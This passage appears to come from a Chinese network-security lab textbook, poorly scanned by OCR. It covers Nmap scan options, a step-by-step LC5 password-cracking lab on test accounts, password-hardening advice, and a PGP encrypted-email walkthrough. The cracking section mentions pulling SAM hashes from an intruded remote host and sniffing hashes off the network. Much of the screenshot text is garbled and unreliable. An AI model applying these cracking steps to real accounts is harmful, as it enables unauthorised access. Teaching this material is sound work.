Nmap 的 参数 可 以 分 为 扫描 类 型 参数 和 扫描 选项 参数 。 扫 描 类 型 参数 指定 Nmap 扫描 
实现 机 制 ,扫描 选项 参数 则 确定 了 Nmap 执行 扫描 时 的 一 些 具体 动作 。 
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常用 的 Nmap 扫描 类 型 参数 主要 有 

-sT: TCP connect 扫描 ,类 似 于 Metasploit 中 的 TCP 扫描 模块 。 

-sS: TCP SYN 扫描 ,类 似 于 Metasploit 中 的 SYN 扫描 模块 。 

-sE/-sX/-sN; 这 些 扫描 通过 发 送 一 些 特殊 的 标志 位 避 开 设备 或 软件 的 监测 。 

-sP; 通过 发 送 ICMP echo 请 求 探测 主机 是 否 存活 ,原理 同 Ping. 

-sU: 探测 目标 主机 开放 了 哪些 UDP 端口 。 

-SA: TCP ACK 扫描 ,类 似 于 Metasploit 中 的 ACK 扫描 模块 。 

常用 的 Nmap 扫描 选项 有 

-Pn: 在 扫描 前 ,不 发 送 ICMP echo 请 求 测试 目标 是 否 活跃 。 

-O: 启用 对 于 TCP/IP 协议 栈 的 指纹 特征 扫描 ,以 获取 远程 主机 的 操作 系统 类 型 等 


-F: 快速 扫描 模式 ,只 扫描 在 nmap-services 中 列 出 的 端口 。 

-p 志 端口 范围 之 : 可 以 使 用 这 个 参数 指定 希望 扫描 的 端口 ,也 可 以 使 用 一 段 端口 范围 
(如 1 一 1023)。 在 IP 扫描 中 (使 用 -sO BRO ,该 参数 的 意义 是 指定 想 要 扫描 的 协议 号 (0 一 
255) 。 

使 用 -sV 扫描 选项 。 

使 用 -sV 扫描 选项 可 以 获取 目标 地 址 更 加 详细 的 服务 版 本 等 信息 。 

输入 下 面 的 命令 行 。 


msf» nmap - sV - Pn 192.168.1.1 
得 到 的 -SV 扫描 结果 如 下 。 


[* ] exec: nmap - sV - Pn 192.168.1.1 

Starting Nmap 5.51SVN (http://nmap.org) at 2016- 05- 02 21:31 CST 
Nmap scan report for 192.168.1.1 

Host is up (1.05 latency). 

Not shown: 994 closed ports 


FORT STATE SERVICE VERSION 
22/tap cpen ssh OpenSSH 3.9pl (protocol 1.99) 
53/tcp cpen demain — ISCBIND 9.2.4 

1H/tep open rpcbind 

li3/tpp — pen ident athi 

5l4/top filtered shell 

32769/tqp open pind 


Service detection perfomed. Please report any incorrect results at http://nmap.org/submit/. 
Nmap done: 1 IP address (1 host up) scanned in 265.02 seconds 


可 以 看 出 ,扫描 结果 对 端口 的 具体 信息 也 进行 了 扫描 ,甚至 列 出 了 使 用 端口 的 程序 的 名 
称 及 版 本 信息 。 


实验 报告 要 求 


。 写 明 实验 目的 。 
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* 附 上 实验 过 程 的 截图 和 结果 。 
* 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 9 童 口令 破解 及 安全 加 密 电 邮 实 验 


9.1 口令 破解 实验 


实验 器 材 

LOphtCrack5. 02 密码 破解 工具 /John the ripper 密码 破解 工具 ,1 套 。 
BO Gi 

实验 任务 

了 解 账号 口令 的 安全 性 ,掌握 安全 口令 的 设置 原则 ,以 保证 账号 口令 安全 。 
实验 环境 


硬件 : 一 台 安 装 Windows 7、Linux(Red Hat) 系 统 的 计算 机 。 
软件 : LOphtCrack5. 02 密码 破解 工具 /John the ripper 密码 破解 工具 。 


实验 步 又 


1. 使 用 LOphtCrack5. 02 破解 密码 

事先 在 主机 内 建立 用 户 名 test, 密 码 分 别 设置 为 空 密码 、123123、security、security123 
进行 测试 。 

启动 LC5 ,弹出 LCS 的 主 界面 ,如 图 9. 1. 1 所 示 。 


(© Lc5 容 笑 汉化 版 Q0:40940064 http://978229.126.com - [无 标题 1] 
文件 (F) 查看 (Y) SAMS) 任务 (C) 纠正 (R) MRH) 
ELIT 


etesreràsruage 


[Eos AEA aOR 7 | 快捷 工具 栏 


破解 结果 
显示 窗口 


春天 下 难 容 之 事 , 笑 世 园 可 笑 之 人 ! 。 容 笑 G840940954 


图 911 LC5 的 主 界面 
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打开 文件 菜单 ,选择 LCS 向 导 , 如 图 9.1.2 所 示 。 


(© Lc5 容 笑 汉化 版 QQ:40940064 http://978229.126.com - [无 标题 1] 
EEV) SiS) 任务 (C) MER) 帮助 (H) 
新 建 会 话 (N).， 
ma USAS e nage 
ADC)... 
保存 (5) Cus [uuum AEA 


Sto 
DTE] 


SWEEP)... 
退出 (x) 


春天 下 难 春 之 事 , 笑 世 同 可 笑 之 人 ! 250040040064 


图 912 开始 L05 向 导 破解 功能 
接着 会 弹出 LC 向 导 , 如 图 9.1. 3 所 示 。 


LC5 向 导 


IU ROEE LCS 向 导 ,此 向导 格 控 步 台地 提示 您 完 

MET sursuwas : ) 

fj m.eneseumcacememezexn 
FTS ENARDIR Is NM LIRE 


第 三 步 您 将 选择 以 何 种 方式 来 报告 破解 结果 。 


CUMERD IPSE SS LE 当 破 解 
码 完成 后 程序 会 通知 您 。 


按 下 一 步 俊 续 此 向 导 。 
下 次 启动 不 在 显示 此 向 导 [D] 


图 913 1LC5 向 导 


单 击 Next 按钮 ,弹出 如 图 9. 1. 4 所 示 的 对 话 框 。 

如 果 破 解 本 机 计算 机 的 口令 ,并 且 具 有 管理 员 权 限 ,那么 选择 “从 本 地 机 器 导入 ”; 如 果 
已 经 侵入 远程 的 一 台 主 机 ,并 且 有 管理 员 权 限 ,那么 选择 “从 远程 电脑 导入 ”, 这 样 就 可 以 破 
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B] 。 从 下 列 各 项 中 选择 一 个 导入 加 密 口令 的 方法 


© 从 本 地 机 器 导入 [L) 
从 本 地 电脑 导入 ， 但 需要 管理 员 权限 。 


C 从 运程 电脑 导入 [R] 
在 悠 电脑 域 的 远程 电脑 导入 加 密 文 件 ,需要 管 
理 员 权限 。 


C 从 NT 40 紧 急 修复 盘 导 入 [E] 


从 Windows NT 4.08 上 操作 系统 的 紧急 修复 盘 
中 导入 文件 “sam 或 "sam MEOS. 


C 从 本 地 电脑 昨 探 导入 [S] 
AED 令 般 要 管理 员 的 权限 才能 执行 。 


上 使 用 的 网 络 登 
i 文件 或 打印 共享 等 口 


图 914 选择 导入 加 密 口令 的 方法 


解 远程 主机 的 SAM 了 (这 种 方法 对 使 用 syskey 保护 的 计算 机 无 效 ); 如 果 获 得 了 一 台 主 机 
的 紧急 修复 盘 ， paper ranit SAM; LC5 还 提供 在 网 络 中 探测 加 密 口令 的 
选项 ,LC5 可 以 在 一 台 计 算 机 向 另外 一 台 计 算 机 通过 网 络 进行 认证 时 的 挑战 /应 答 过 程 中 
截获 加 密 口 令 散 列 ,这 也 要 nud cu 本 实验 主要 是 破解 本 地 计算 
机 的 口令 ,所 以 选择 “从 本 地 机 器 导入 ”, 然 后 单 击 Next 按钮 ,弹出 如 图 9. 1. 5 所 示 的 对 


选择 破解 方法 


C 快速 口令 破解 (0) 
公公 把 宇 典 中 的 每 个 单词 和 口令 进行 简单 对 照 
EI 


C 普通 口令 破解 (CO 


使 用 字典 中 的 单词 进行 普通 的 破解 ， 并 把 宇 典 
中 的 单词 进行 修正 破解 。 


C 复杂 口令 破解 (5] 


使 用 字典 中 的 单词 进行 普通 的 破解 ， 
中 的 单词 进行 修正 破解 ， RSEN. 
ESSA 数字 、 符 号 进行 尽 可 能 的 组 


C BEM) BELEH 


图 915 选择 破解 方法 
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于 设置 的 是 空 口令 ,所 以 选择 快速 口令 破解 即 可 破解 口令 ,再 次 单 击 Next 按钮 , 弹 
出 如 图 9.1.6 所 示 的 对 话 框 。 


选择 报告 风格 


aA Pick Reporting Style 
01 F3É 
27EIBASDMAESI bee 
48C3OEEI: 在 大 部 分 时 间 里 ， 您 想 要 知道 破解 到 的 口令 ; 


什么 ， 但 是 在 特定 的 情况 下 ， ca 
的 口令 ,是否 显 示 可 由 你 决定 : 


厂 SECHS ee) 


选中 此 项 ， 将 显示 操作 系统 的 加 密 口 今 ， 这 些 
值 可 能 对 一 些 用户 的 其 它 口令 有 关 。 


Iv 显示 完成 破解 每 个 口令 的 剩余 时 间 [T) 
选中 此 项 ， 格 中 显示 框 中 增加 一 个 项 目 ， 显 示 
完成 破解 每 个 口令 的 剩余 时 间 。 


M 显示 破解 方法 


显示 破解 此 加 密 文 件 所 用 的 破解 方法 ， 有 效 地 
检测 当前 用 户 的 弱 口 邻 非常 有效。 


[v 当 破 解 完成 时 显示 信息 [V)] 


<Back Cancel 


图 916 选择 报告 风格 


选择 默认 的 选项 即 可 ,接着 单 击 Next 按钮 ,弹出 如 图 9. 1.7 所 示 的 对 话 框 。 


Segin Auditing 
o1 F3 


DGE LCS ST dm mmr» 
ENH wRRNAR, REAOR ASEM 


(e AA Hin RSE BIOS 口令 ] 
RD 


K 保存 这 些 设置 到 会 话 默 认 
按 充 成 开始 破解 


图 917 开始 破解 


单 击 Finish 按钮 ,软件 就 开始 破解 账号 口令 了 。 口令 为 空 的 破解 结果 如 图 9. 1. 8 
所 示 。 
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© Lc5 容 笑 汉化 版 Qq:40940064 http://978229.126.com - [无 标题 g 
文件 (F) BSW) 会 话 (5) 任务 (CO MER 帮助 (H) 


字典 。 “1 of 1 [E:\hack\ 容 笑 居 \LOphtCrackiwords-english.dic] 


图 918 口令 为 空 的 破解 结果 


可 以 看 到 ,用 户 test 的 口令 为 空 ,软件 很 快 就 破解 出 来 了 。 
把 test 用 户 的 口令 改 为 123123 再 次 测试 ,由 于 口令 不 是 太 复 杂 , 还 是 选择 快速 口令 破 
解 。 口 令 为 123123 的 破解 结果 如 图 9. 1.9 所 示 。 


Ie Lc5 容 笑 汉化 版 QQ:40940064 http://978229.126.com - [无 标题 7] 
文件 (F) EEV) 会 话 (5) 任务 (C) MER) 帮助 (H) 


CT RN MN 
EUR 


Administrator 


] imi 证 口令 [«.[n$ 


HelpAssistant 


字典 1 of 1 [E;\hack\ 容 笑 居 \LOphtCrackiwords-english,dic] 


图 919 口令 为 BIB 的 破解 结果 


可 以 看 到 ,test 用 户 的 口令 123123 也 被 很 快 地 破解 出 来 。 
把 主机 口令 设置 得 复杂 一 些 ,不 选用 数字 ,选择 某 些 英文 单词 ,如 security 再 次 测试 ,由 
于 口令 复杂 了 一 些 ,破解 方 法 选择 "普通 口令 破解 ”测试 结果 如 图 9. 1. 10 所 示 。 


(© Lc5 容 笑 汉化 版 QQ:40940064 http://978229.126.com - [无 标题 6] 
文件 (F) EEV 会 话 (5) 任务 (C) MER) 帮助 (H) 


etenbeomes?»uage 
EET ERN 


| mi 证 口令 [<...[9$ 


FA “1 of 1 [E:\hack\ 容 笑 居 \LOphtCrackiwords-enghish.dic] 
图 9110 口令 为 seourity 的 破解 结果 


= 2AT + 


可 以 看 到 ,口令 security 也 被 破解 出 来 了 ,只 是 破解 时 间 稍 微 有 点 长 。 
把 口令 设置 得 更 加 复杂 一 些 , 改 为 security123, 选择“ 普通 口令 破解 ”, 测 试 结果 如 
图 9.1.11 Bras. 


EX QQ:40940064 http://978229 
文件 (F) 查看 (Y) 会 话 (5) 任务 (CO MER 帮助 (H) 


GLOLEFSS> usage 
运行 《报告 


[muaas [<..[9$ 


El = "e 
字典 — “1 of 1 [E:lhack S JB LOphtCrack|words-english.dic] 


图 9111 普通 口令 破解 密码 


可 以 看 到 ,普通 口令 破解 并 没有 完全 破解 成 功 ,密码 的 最 后 几 位 没 破 解 出 来 ,这 时 应 该 
选择 复杂 口令 破解 方法 ,因为 这 种 方法 可 以 把 字母 和 数字 进行 尽 可 能 的 组 合 , 破 解 结果 如 
图 9.1.12 所 示 。 


(© Lc5 容 笑 汉 化 版 Q0:40940064 http:11978229.126.com - [无 标题 10] 
四 查看 (V) 会 话 (5) 任务 (C) MER) 帮助 (H) 


ete5bevébtruageo 


[mugne jejas 


A912 复杂 口令 破解 密码 


可 以 看 到 ,复杂 口令 破解 速度 虽 慢 ,但 把 比较 复杂 的 口令 security123 破解 出 来 了 ,其 实 
还 可 以 设置 更 加 复杂 的 口令 ,采用 更 加 复杂 的 自 定义 口令 破解 模式 ,设置 界面 如 图 9. 1. 13 
TA o 

其 中 ,“ 字 典 攻击 ”中 可 以 选择 字典 列表 中 的 字典 文件 进行 破解 ,LC5 本 身 带 有 简单 的 
字典 文件 ,也 可 以 自己 创建 或 者 利用 字典 工具 生成 字典 文件 :混合 字典 ?破解 口令 把 单词 、 
数字 或 符号 进行 混合 组 合 破解 。 

“预定 散 列 ? 攻 击 是 利用 预先 生成 的 口令 散 列 值 和 SAM 中 的 散 列 值 进行 匹配 ,这 种 方 
法 由 于 不 用 在 线 计算 Hash, 所 以 速度 很 快 ;利用 “暴力 破解 ”中 的 字符 设置 选项 ,可 以 设置 为 
“字母 十 数字 ”“ 字 母 十 数字 十 普通 符号 “字母 十 数字 十 全 部 符号 ”, 这 样 就 从 理论 上 把 大 部 
分 密码 组 合 都 可 以 采用 暴力 方式 遍历 所 有 字符 组 合 破解 出 来 了 ,只 是 破解 时 间 可 能 很 长 。 
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2. 掌握 安全 的 密码 设置 策略 

暴力 破解 理论 上 可 以 破解 任何 密码 ,但 如 果 密 码 过 于 复杂 ,暴力 破解 需要 的 时 间 会 很 长 
(如 几 天 ) ,在 这 段 较 长 的 时 间 内 ,增加 了 用 户 发 现 人 侵 和 破解 行为 的 机 会 ,以 采取 某 种 措施 
阻止 破解 ,所 以 密码 的 复杂 度 越 高 越 好 。 一 般 设置 密码 要 遵循 以 下 4 个 原则 。 

(1) 口令 长 度 不 小 于 8 个 字符 。 

(2) 包含 有 大 写 和 小 写 的 英文 字母 .数字 和 特殊 符号 的 组 合 。 

(3) 不 包含 姓名 、 用 户 名 ,单词 ,日 期 及 其 这 几 项 的 组 合 。 

(4) 定期 修改 口令 ,并 且 对 新 密码 做 较 大 的 变动 。 

例如 ,974a3K%n_4$ Frl# 就 是 一 个 复杂 度 很 高 的 口令 ,破解 软件 需要 花费 很 长 的 时 
间 才 能 破解 。 

3. 密码 破解 的 防护 

syskey 可 以 使 用 启动 密 钥 保 护 SAM 中 的 账号 信息 。 上 默认 情况 下 ,启动 密 钥 是 一 个 随 
机 生成 的 密 钥 ,存储 在 本 地 计算 机 上 。 这 个 启动 密 钥 在 机 器 启动 后 必须 正确 输入 ,才能 登录 
系统 。 通 过 在 命令 行 界面 下 输入 命令 syskey, 按 回 车 键 后 即 会 启动 syskey 的 设置 界面 ,如 
图 9.1.14 所 示 。 


自 定义 破解 选项 
Iv 使 用 “字典 攻击 ”破解 口令 


a ec say glare ea 


Tete 点 击 这 


ELS 


Iv 使 用 “混合 字典 ”破解 口令 
DSBRERutA osten. 数字 或 符 


Iv 使 用 “预定 散 列 ”破解 口令 


[ML 


此 破解 方法 只 对 Windows Lt 认证 口令 有 效 . 


散 列 文件 列表 


Iv 使 用 “暴力 破解 ”破解 口令 


Me 


保证 Windows XP 账户 数据 库 的 安全 
By Tine, r 


一 旦 启用 这 个 加 密 就 不 能 禁用 。 


wo 


ma | eoo 
图 91.13 自 定义 破解 选项 914 syskey 的 设置 界面 


通过 syskey 保护 ,攻击 者 即使 通过 另外 一 个 操作 系统 挂 上 你 的 硬盘 , 偷 走 你 计算 机 上 
的 一 个 SAM 的 副本 ,这 份 SAM 副本 对 于 它们 也 是 没有 意义 的 ,因为 syskey 提供 了 非常 好 
的 安全 保护 。 当 然 ,要 防止 攻击 者 进入 系统 后 对 本 地 计算 机 启动 密 钥 的 搜索 ,可 以 通过 配置 
syskey 时 将 启动 密 钥 存 储 在 软盘 上 实现 启动 密 钥 与 本 地 计算 机 的 分 隔 。 
另外 ,还 可 以 通过 选择 安全 的 身份 验证 协议 ,防止 嗅 探 器 探测 到 网 络 中 传输 的 密码 。 默 
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认 的 身份 认证 协议 是 Kerberos v5, 它 采用 了 复杂 的 加 密 方式 防止 未 经 授权 的 用 户 截 获 网 络 
中 传输 的 密码 信息 。 但 是 ,如 果 计 算 机 没有 加 入 到 域 中 ,它们 采用 的 身份 认证 协议 就 是 
NTLM, NTLM 采用 询问 应 答 的 方式 进行 身份 验证 , 它 有 3 种 变 体 : LM(Lan Manager), 
NTLM version 1 和 NTLM version 2。 其 中 ,NTLM version 2 是 最 安全 的 身份 验证 方式 。 
为 了 加 强 网 络 安 全 性 ,需要 关闭 LM 和 NTLM version 1 这 两 种 相对 不 安全 的 方式 。 

可 以 通过 控制 面板 一 管理 工具 一 本 地 安全 策略 ,在 打开 的 本 地 安全 策略 窗口 中 打开 安 
全 设置 \ 本 地 策略 \ 安 全 选项 ,在 右 侧 的 窗口 中 双击 打开 “网 络 安全 : Lan Manager 身份 验证 
级 别 ”, 在 列表 中 选择 “ 仅 发 送 NTLMv2 响应 \ 拒 绝 LM&NTLM”, 如 图 9.1.15 所 示 。 


网 络 安全 : LAN Manager 身份 验证 级 别 属性 区 区 


网 络 安全 : LAN Manager 身份 验证 级 别 


TX NTUIv2 啊 应 \ 拒 绝 LM & NTLM ~| 
A gx 3 能 影响 与 客户 六 服务 和 应 用 程序 的 兼容 性 。 
SEE Qu er MADE 


m amm m DS 
图 9115 身份 验证 协议 的 选择 界面 


Windows 系统 里 有 很 多 措施 可 以 增强 密码 口令 的 安全 性 。 
9.2 安全 加 密 电 邮 实 验 


实验 器 材 


PGP 电子 加 密 邮 件 、.Foxmail(Outlook) 邮 件 客户 端 ,1 套 。 
PC,1 fi, 


预习 要 求 


(1) 做 好 实验 预习 ,复习 安全 加 密 电 邮 技 术 的 有 关内 容 。 
(2) 熟悉 PGP 软件 的 使 用 方法 。 

(3) 熟悉 Outlook 软件 的 使 用 方法 。 

(4) 熟悉 实验 过 程 和 基本 操作 流程 。 

(5) 做 好 预习 报告 。 


实验 任务 


了 解 PGP 加 密 的 原理 ,掌握 PGP 软件 的 使 用 方法 ,对 加 密 产生 直观 认识 ;了 解 安全 电 
子 邮 件 的 使 用 方法 ,加 深 对 数字 证 书 的 理解 及 其 在 安全 领域 中 的 广泛 应 用 。 
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实验 环境 


硬件 : 安装 Windows Server 的 计算 机 、 邮 件 服务 器 ( 公 网 ) 。 

软件 : PGP 电子 加 密 邮 件 、.Foxmail(Outlook) 邮 件 客户 端 等 。 

预备 知识 

深入 理解 PGP 的 工作 过 程 (只 认证 、 只 加 密 、 认 证 和 加 密 ) 及 加 密 相关 的 操作 。 

熟练 掌握 OutLook 软件 首发 邮件 的 操作 。 

实验 步 又 

1. PGP 的 安装 ,创建 密 钥 对 (版 本 PGPfreeware 6. 5.3) 

运行 安装 程序 PGPfreeware 6. 5. 3. exe, 前 面 的 安装 界面 和 大 部 分 的 Windows 程序 相 
同 。 根 据 提示 单 击 Next 按钮 即 可 。 在 安装 过 程 中 ,系统 会 询问 你 是 否 已 经 拥有 “ 密 钥 对 ”。 
图 9.2. 1—[8 9.2.6 所 示 为 安装 的 过 程 。 


W Hindows Catalog 

A Yindows Update I) Acrobat Distiller 6.0 

@ 设 定 程序 访问 和 默认 值 WE] Adobe Acrobat 6.0 Standard 

国 FTF Office 文档 图 Microsoft Visual Studio 6.0 > 

T 88e office 文档 @ Microsoft Web Publishing L 

B® Coolstreaming E Daemonseript > 
, 
, 


图 Printlle Internet Printing 


[RTT @ 超星 数字 图 书馆 36 
名 ICA Lite 


图 Merriam-Webster 


$È MSN Mess: 
@ mare 
€ Arita By PoPtray 


ene N 7 PGPkeys 


[78.7] k 
@ 游戏 
@ Internet Explorer [ET 
PD Mut Tonk Renracs E vorsub. r 


921 进入 程序 环境 


Key Generation Wizard 
What name and email address should be associated with this key 
pair? 


By listing your name and email address here, you let your 
correspondents know that the key they are using belongs to you. 


Ful name: 
[huangie 


Email address: 


ruengie 2000@163com ———————————— 


m | ww | 
922 输入 名 称 和 邮件 地 址 
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Key Generation Wizard 


What type of key would you like to generate? If you don't know, 
it's recommended that you generate a Diffie-Hellmar/DSS key 
pair 


RSA is the "old-style" PGP key. Most new users of PGP will be 
expecting a Diffie Hellman/DSS key. 


If you'd ike more information on the differences between the two 
key types, press the Help button, below 


Key Pait Type 
© Diffie-Helmar/DSS. 
C BSA 


图 923 选择 密 钥 产生 方式 


Key Generation Wizard 


How large a key pair do you wish to generate? As a rule, larger 
keys are more secure, but slower. 


For most applications, 1024 - 2048 bit keys are quite sufficient 
Key Pair Size 


C 1024 bits 
C 1536 bits (1536 Diffie Hellman/1024 DSS) 


i 


© 3072 bits (3072 Diffie Helman/1024 DSS) 
C. Custom (1024 - 4096 bits) 


c 


IS 2] 取消 


图 924 选择 密 钥 对 的 长 度 


Key Generation Wizard 


You can set your key pair to automatically expire within a certain 
amount of time. 


When your key pair expires, you will no longer be able to use it for 
encrypting or signing. However, it wil stil decrypt and verify. 


Once you generate your key pair, you will not be able to change 
its expiration setting. 


Key Expiration 


C Key pait neyer expires 


© Key pair eypies on [2008- 4-26 ~ 


xm | ww | 
图 925 选择 密 钥 对 的 有 效 期 限 


Key Generation Wizard [x] 
Your private key will be protected by a passphrase. It is important 
that you do not write this passphrase down. 


Your passphrase should be at least 8 characters long and should 
contain. lic characters. 


Passphrase: F Hide Typing 


«50 [T—5 0 >] 取消 | æ» | 


图 926 输入 Pessphrase 


PGP 的 安全 性 依赖 于 你 的 私 钥 是 否 安全 ,如 果 你 的 私 钥 不 小 心 泄露 出 去 ,PGP 也 就 毫 
无 安全 性 可 言 了 。 私 钥 越 长 ,PGP 的 安全 性 越 高 。 因 此 ,一 般 人 是 不 可 能 记 住 它 的 。 

Passphrase 就 是 用 来 保护 “ 密 钥 ”的 密码 。 当 PGP 需要 使 用 你 的 私 钥 时 ,会 提示 你 输入 
Passphrase。 

Passphrase 非常 重要 ,建议 大 家 的 Passphrase 尽量 长 些 ,并 且 包 含 非 字母 元 素 , 以 免 被 
黑客 用 “ 穷 举 法 ”破解 。 

根据 提示 单 击 “ 下 一 步 ”按钮 , 密 钥 对 就 创建 完成 了 。 新 的 密 钥 对 会 出 现在 PGPkeys 
中 ,如 图 9.2.7 所 示 。 


* PGPkeys 


DP Ann Campi <acampi@nai. con? 2048/1024  DM/DSS publi 
mO Bill Blanke wjbüpgp. com> 4096/1024 — DM/DSS publi 
HP Chanda Groom Cchanda groonünai 2048/1024  DW/DSS publi 
mO Danon Gallaty deslüpgp. con? 3012/1024 DW/ISS publi 
BD Phuangjie <huangjie 200081 g 2048/102 

日 回 huangjie Qhuangjie_20008163. 

从 huangjie huanejie 20008. DSS expor tabi 
mO Jason Bobier 《jasonBpgp com> 2058/1024  DW/DSS publi 
mO Katherine Massucci Pettit <mp. 2048/1024  DM/DSS publi gj 
< 


1 key(s) selected 


图 927 密 钥 对 创建 完毕 


eh tie henna or ai ste 
么 ,你 所 有 加 密 过 的 文件 和 数据 就 再 无 法 找 回 oce away erroe nodi aan 


accidental fle deletion without having a backup wil render the 
: ia PGP 推荐 使 用 者 备份 自己 的 密 钥 ,以 防 意外 ， | bev and atdataencipted wth that Key useless 
如 图 9. 2. 8 所 示 。 ba medum aher hanuman ave es 


2. RADHA ] Dontsave| Cancel 
要 发 布 自己 的 公开 密 钥 ,知道 公开 密 钥 的 人 越 


多 ,能 够 发 送 加 密 信件 的 人 也 就 越 多 。 

公 钥 的 发 布 方式 一 般 有 两 种 ,直接 将 自身 的 公 钥 交 给 朋友 或 者 一 个 公共 的 公 钥 管理 机 
构 发 布 公 钥 ,所 有 想 要 给 发 信 的 人 都 可 以 从 这 个 密 钥 管理 机 构 下 载 公 钥 。 

如 果 采 用 第 一 种 方法 发 布 公 钥 , 首 先 必须 制造 公开 密 钥 文件 ,以 便利 用 网 络 传播 给 其 他 
人 ,制造 方法 是 ,在 PGPkey 中 选择 菜单 命令 Eb Ra OTE 一 个 公用 密 钥 文件 ,如 
yourname. asc。 这 个 . asc 文件 就 是 公 钥 ,只 要 将 它 安全 地 交 给 朋友 就 可 以 了 。 

发 布 公 钥 最 好 的 方式 是 上 载 到 Key Server。PGP pe tie 的 Key Server, 
可 以 任 选 一 个 。 在 PGPkey 中 点 公 钥 ,选择 Server Send to 即 可 ,如 图 9. 2. 9 所 示 。 


了 PGPkeys 

Edit View Keys ROAGA Groups Help 
Tere se: 0 <.: per 
Search Ctrl+P 
Update Ctrl+G 
Retrieve Certificate 


ldsp://certserver. pep. com 


HOP Ann Campi <acanpi 

ne Bill Blanke <yjbg " R 
mO Chanda Groom (cha date Reyocations ] 2048/1024 DH/DSS poblie key 
3012/1024 — DW/DSS public key 
2048/1024 DH/DSS key pair 

] 2048/1024  DM/DSS pale key 


M @ Damon Gallaty de 

A huangjie 2005 Quancji bapti 

mO husngjiebupt <huangji ebupt@163, 

DE .huanejie Xhuangjie 200001 
日 回 huangjie Qhuangjie 20000163. 

Ay buangjie Ohuangjie 20008. 

(HO Jason Bobier jesonüpgp. con? 

ig OP Katherine Massucci Pettit Gop 

ij OP Marc Dyksterhouse (narcdüpgp. com> 

HO Mark J. McArdle <markn@pgp. con) 

mO Michael K Jones <njones@nai. com> 

HO Myles Monroe 人 pmonrosBnai con? 

GO Network Associates PGP Softwar 


M 


1 key(s) selected 


osa 


DSS exportable signatu 
2059/1024 DH/DSS public key 
| 2048/1024 DH/DSS public key 
2048/1024 — DW/DSS public key 
] 2048/1024 DH/DSS public key 
2048/1024 — DW/DSS public key 
2048/1024 DH/DSS public key 
| 1024 DH/DSS public key 


98988868 OF 


929 将 密 钥 上 载 到 Key Saver 


3. 获取 公 钥 

获取 其 他 人 的 公 钥 也 有 两 种 方法 : 直接 索取 或 者 在 Key Server 上 搜索 得 到 。 

先 说 第 一 种 方法 , 当 你 得 到 别人 的 公 钥 文件 时 ,使 用 菜单 Key Import 将 其 导入 即 可 。 

如 果 对 方 的 公 钥 发 布 在 Key Server 上 ,那么 公 钥 的 获得 更 加 方便 。PGP 的 Key Server 
提供 了 一 个 非常 好 用 的 公 钥 搜索 引擎 。 选 择 菜单 命令 Server 习 Search, 输 入 你 需要 的 公 钥 
名 称 即 可 ,如 图 9. 2. 10 所 示 。 


¿3 PGPkeys Search Window 


Search for keys on | http://pgpkeys.mit. edu: 11371 v| where Search 
User ID. +} | contains | [Damon Gallaty Clear Search 


More Choices | Fewer Choice: 


Keys Validity | Trust [Size 
mO Damon Gallaty <dgal@pep. com> 1024 
HO Damon Gallaty <dgal@pep. com> [——À 300/1024 
mO Damon Gallaty <dgel@pep. com> co 2048/1024 
pem 
J 


EO Damon Gallaty <dgal@pgp. com> 2048/1024 
C) 


gf'|Found 5 key (s) matching search criteria. 


图 9210 通过 Key Sewer REAA 
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在 搜索 的 结果 中 选择 需要 的 公 钥 ,在 右键 菜单 中 单 击 Export 可 以 导出 普通 的 公 钥 文 
TE ,然后 再 导 和 人 到 PGPkeys 中 即 可 ,如 图 9. 2. 11 所 示 。 


¿I PGPkeys Search Window 

Search forkeys on [nitp//pgpkeys.mited11371 — v] where Seach 

[Use] =] feovare zjm ew Seach 
Help 


Keys Validity ize Description 


Wig Dawon Gallaty Cgal@cad gutech Revoked RSA public key 
aty <dgal@pep. com> ESA public key 


DM/DSS public key 
2048/1024 — DW/DSS public key 


» 


Key Properties 
| 1 key(s) selected 


图 9211 S4 


导出 需要 的 公 钥 后 ,双击 打开 该 公 钥 ,出 现 图 9. 2. 12 ,再 单 击 Import 按钮 将 公 钥 导入 
自己 PGPkeys 的 列表 中 。 


* Select key (s) DR 


Select the key(s) you would like to import to your keyring : 
[es | Yvaidity | trust [Size —— | Descr: 
e — (02. 


ae laty (dg J 1024  DH/DSS 


E9210 SABHA 


4. 文件 加 密 解密 

假设 要 加 密 一 个 Word 文档 encryption test. doc, FER MH LAH. HE PGP 后 弹出 
一 个 窗口 ,共有 Encryp.Sign,Encrypt and sign 和 Wipe 4 个 选项 ,其 中 Encryp 表示 加 密 ， 
Sign 是 签名 ,Encrypt and sign 是 加 密 和 签名 的 组 合 , Wipe 是 将 文件 删除 。 

选择 Encryp, 弹 出 “ 密 钥 选择 ”对 话 框 ,如 图 9. 2. 13 所 示 。 

Recipients 表示 收 件 人 ,也 就 是 选择 的 加 密 公 钥 。 加 密 后 的 文件 只 有 收 件 人 使 用 他 的 
私 钥 才 能 打开 ,所 以 一 般 不 选择 Wipe Original( 删 除 原文 件 )。 如 果 只 是 想 加 密 文件 ,以 防 
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m: PGPshell - Key Selection Dialog 


Drag users from this list to the Recipients list 
FejAnn Campi <acampi@nai. com> 

FETBi11 Blanke <ejb@pep. com> 

[z]Chande Groom <chanda_groon@nai. com> 


‘Ghuangjie 20008163. com> 2048/1024 
[zlJason Bobier <jason@pep. com> 2059/1024 
[zlJason Bobier <jbobier@prismatix. con? 2059/1024 
[zlJason Bobier <jbobier@privnet. com> 2059/1024 
[z]Jason Bobier q0595098hobbes kzoo edu? 2059/1024 


Recipients E Sire 
|huangjie 2005 <huangji ebupt@163. com> 2048/1024 


— | [Gest 
厂 Wipe Original 
[^ Conventional Encryption 

P Self Decrypting Archive 


图 9213 "SERE" 对 话 框 


止 被 别人 窃取 ,可 以 使 用 自己 的 密 钥 加 密 , 这 样 ,只 有 你 自己 才能 打开 文件 。 
生成 的 加 密 文件 以 . pep 结尾 , 右 击 加 密 文件 ,从 快捷 菜单 中 选择 PGP— Decrypt, PGP 
程序 自动 提取 出 其 中 的 公用 密 钥 ,并 提示 用 户 输入 私 钥 的 Passphrase( 见 图 9. 2. 140 ,检验 


通过 后 ,还 原 为 原始 文件 。 但 是 ,PGP 在 处 理 中 文 时 并 不 是 很 理想 ,中 文 文件 名 在 还 原 时 有 
时 不 能 正常 显示 。 


PGPshell - Enter Passphrase 


Message was enctypled to the folowing pubic keyís] : 
[huangie 2005 chuangiebupK (S183 com... [DH/2048] 


Enter passphrase for your private key 


9214 输入 私 钥 的 Passphrase 


5. 数字 签名 

签名 方法 和 加 密 一 样 ,使 用 方法 也 和 加 密 一 样 。 选 择 菜单 中 的 Sign, 弹 出 “数字 签名 ” 
对 话 框 ,如 图 9. 2. 15 所 示 。 

